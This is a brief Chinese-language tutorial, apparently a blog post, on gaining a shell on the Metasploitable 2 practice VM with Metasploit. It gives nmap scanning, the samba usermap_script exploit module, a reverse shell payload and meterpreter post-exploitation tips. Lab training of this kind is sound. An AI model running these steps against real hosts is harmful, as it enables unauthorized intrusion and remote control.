1. 程式人生 > >metasploit拿Metasploitable 2 shell

metasploit拿Metasploitable 2 shell

進入metasploit系統

msfconsole

 

Nmap埠掃描

nmap –sV IP(或者域名),如果機器設定有防火牆禁ping,可以使用nmap -P0(或者-Pn) –sV IP(或者域名),通過這兩個命令可以檢視主機的開放情況: 

滲透最重要的兩個引數是開放狀態和版本號, 版本號也就是系統掃描中,在開發安全掃描件裡經常提及的漏洞指紋,因為大部分漏洞的產生就是某一版本的問題. 通過nmap主要是知道埠開放情況(STATE)和指紋資訊(服務名稱和版本號),然後可以根據指紋資訊百度,該版本是否存在漏洞

 

1>使用search命令查詢相關模組

 

search Name 本例就是:search samba 

 

2>使用use排程模組

找到了我們需要攻擊的目標模組,我們就使用它,通過命令:use ExploitName

該例就是:use exploit/multi/samba/usermap_script

 

3>使用info檢視模組資訊

這步最簡單,就是在上步的基礎上,輸入info就行

4>選擇payload作為攻擊

選擇payload,首先我們要看能使用哪些引數,通過命令:show payloads: 

在選擇攻擊載荷的時候,建議選用和meterpreterreverse相關的載荷。 

通過使用命令:set payload PayloadName。該例為:set payload cmd/unix/reverse

 

技巧: 

a meterpretermetasploit中有什麼瑞士尖刀的稱呼,可以很好的做到後滲透攻擊以及內網滲透,可以參看meterpreter使用。 

b reverse解釋是反彈,由於你攻擊的目標機可能處在內網裡,所以你攻擊的時候存在埠對映等方面的問題,所以如果使用反彈,這個可以更穩定。

5>設定攻擊引數

首先通過show options或者options,檢視需要填寫的引數:

: 目標機器 set RHOST ip      set RPORT port

再次使用options檢視引數是否完整,然後使用exploit或者run就行了,對於部分攻擊模組,可以使用check來判斷